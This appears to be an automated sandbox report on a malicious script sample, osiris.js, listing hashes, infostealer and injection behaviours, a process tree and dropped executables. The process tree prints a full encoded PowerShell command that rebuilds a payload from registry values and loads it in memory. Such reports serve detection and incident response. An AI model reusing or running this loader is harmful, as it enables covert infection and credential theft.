Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
05-03-2021 11:49
Static task
static1
Behavioral task
behavioral1
Sample
osiris.js
Resource
win7v20201028
General
-
Target
osiris.js
-
Size
2.8MB
-
MD5
93b238ff0ba3cb0c1921882d90502124
-
SHA1
9aa505e0f1eb26ca769a715753450c47a89fdcdc
-
SHA256
11c8dc17d50eb9393ca4b9db2ebf6be0989017cbabf39de8d0520e474ad40eb4
-
SHA512
d6c7f571b8124b315f1a4eaa5f2aef3772823709957df050a4641ff45429f4891d957a2d9c730d6636f26fa058b6c5cf3bc67107cf5c1de0f1b4c635b6779690
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
Admin.exeGetX64BTIT.exepid process 2360 Admin.exe 2476 GetX64BTIT.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 api.ipify.org 17 api.ipify.org -
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3756 set thread context of 2360 3756 powershell.exe Admin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
Admin.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 Admin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeAdmin.exepid process 3756 powershell.exe 3756 powershell.exe 3756 powershell.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe 2360 Admin.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3756 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Admin.exepid process 2360 Admin.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
wscript.execmd.exepowershell.exeAdmin.exedescription pid process target process PID 3992 wrote to memory of 196 3992 wscript.exe cmd.exe PID 3992 wrote to memory of 196 3992 wscript.exe cmd.exe PID 196 wrote to memory of 3756 196 cmd.exe powershell.exe PID 196 wrote to memory of 3756 196 cmd.exe powershell.exe PID 196 wrote to memory of 3756 196 cmd.exe powershell.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 3756 wrote to memory of 2360 3756 powershell.exe Admin.exe PID 2360 wrote to memory of 2476 2360 Admin.exe GetX64BTIT.exe PID 2360 wrote to memory of 2476 2360 Admin.exe GetX64BTIT.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Admin.exe"C:\Users\Admin\AppData\Roaming\Admin.exe"4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"5⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exeMD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exeMD5
b4cd27f2b37665f51eb9fe685ec1d373
SHA17f08febf0fdb7fc9f8bf35a10fb11e7de431abe0
SHA25691f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581
SHA512e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e
-
C:\Users\Admin\AppData\Local\Temp\x64btit.txtMD5
4b669744a47d57491bafdc34594d1d83
SHA1e59fcf8262b67b5481c8e8e182ba675a005435cc
SHA256f2e34421ee8298153c1f03e3fa44d1c83e5ad57f3cfd3fa6f6456bbb1517deb3
SHA512dc935a4f1bf9ea32d2c8ac9481fb9ef818b15addc02bb45e15470e30a8ed3caeb57fd233be2a0f7d152937cfb1e59461c0d178f14aacd8636a40b8fe9b97169a
-
C:\Users\Admin\AppData\Roaming\Admin.exeMD5
4db1ee663bd9f021da04edca144f4bd7
SHA1709d318281ceabef246af0107b1db12f237b793a
SHA2563002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
SHA512ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565
-
C:\Users\Admin\AppData\Roaming\Admin.exeMD5
4db1ee663bd9f021da04edca144f4bd7
SHA1709d318281ceabef246af0107b1db12f237b793a
SHA2563002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6
SHA512ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565
-
memory/196-3-0x0000000000000000-mapping.dmp
-
memory/2360-23-0x0000000000400000-0x0000000000456000-memory.dmpFilesize
344KB
-
memory/2360-28-0x0000000000530000-0x00000000005CF000-memory.dmpFilesize
636KB
-
memory/2360-27-0x0000000000400000-0x0000000000456000-memory.dmpFilesize
344KB
-
memory/2360-24-0x0000000000401698-mapping.dmp
-
memory/2476-29-0x0000000000000000-mapping.dmp
-
memory/3756-10-0x0000000007360000-0x0000000007361000-memory.dmpFilesize
4KB
-
memory/3756-14-0x0000000007DB0000-0x0000000007DB1000-memory.dmpFilesize
4KB
-
memory/3756-16-0x0000000008500000-0x0000000008501000-memory.dmpFilesize
4KB
-
memory/3756-17-0x00000000095C0000-0x00000000095C1000-memory.dmpFilesize
4KB
-
memory/3756-18-0x0000000009280000-0x0000000009281000-memory.dmpFilesize
4KB
-
memory/3756-19-0x00000000092E0000-0x00000000092E1000-memory.dmpFilesize
4KB
-
memory/3756-20-0x0000000009B60000-0x0000000009B61000-memory.dmpFilesize
4KB
-
memory/3756-21-0x0000000009670000-0x0000000009672000-memory.dmpFilesize
8KB
-
memory/3756-22-0x00000000097B0000-0x0000000009923000-memory.dmpFilesize
1.4MB
-
memory/3756-15-0x0000000008680000-0x0000000008681000-memory.dmpFilesize
4KB
-
memory/3756-13-0x0000000007F50000-0x0000000007F51000-memory.dmpFilesize
4KB
-
memory/3756-12-0x0000000007470000-0x0000000007471000-memory.dmpFilesize
4KB
-
memory/3756-11-0x0000000007400000-0x0000000007401000-memory.dmpFilesize
4KB
-
memory/3756-9-0x0000000007102000-0x0000000007103000-memory.dmpFilesize
4KB
-
memory/3756-8-0x0000000007100000-0x0000000007101000-memory.dmpFilesize
4KB
-
memory/3756-7-0x0000000007740000-0x0000000007741000-memory.dmpFilesize
4KB
-
memory/3756-6-0x0000000004D70000-0x0000000004D71000-memory.dmpFilesize
4KB
-
memory/3756-5-0x00000000739A0000-0x000000007408E000-memory.dmpFilesize
6.9MB
-
memory/3756-4-0x0000000000000000-mapping.dmp